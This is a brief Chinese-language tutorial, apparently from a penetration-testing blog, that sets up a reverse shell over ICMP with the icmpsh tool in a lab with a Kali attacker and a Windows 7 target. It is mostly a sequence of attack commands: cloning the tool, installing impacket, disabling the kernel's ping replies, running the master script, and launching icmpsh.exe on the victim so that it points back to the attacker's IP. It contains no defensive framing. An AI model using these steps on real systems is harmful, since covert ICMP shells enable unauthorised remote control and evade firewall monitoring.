ICMP隧道
最常见的ping命令就是利用的ICMP协议,使用该协议反弹shell,两台机器不需要开放端口,ICMP隧道简单好用。
实验环境
Kali 192.168.10.144 win7 192.168.10.129
kali安装好icmpsh工具
root@kali:~# git clone https://github.com/inquisb/icmpsh.git
安装icmpsh的依赖包
root@kali:~# apt-get install python-impacket
执行之前最重要的一步是在你的机器上关闭ping回复。这样可以防止内核自己对ping包进行响应。
root@kali:~# sysctl -w net.ipv4.icmp_echo_ignore_all=1
然后把icmpsh.exe上传到win7机中。
Kali执行操作:
python icmpsh_m.py 本机ip 目标ip
root@kali:~/icmpsh# python icmpsh_m.py 192.168.10.144 192.168.10.129
win7直接icmpsh.exe -t 攻击机ip
Kali就可以接受一个icmp反弹回来的shell
最后不要忘记把1改为0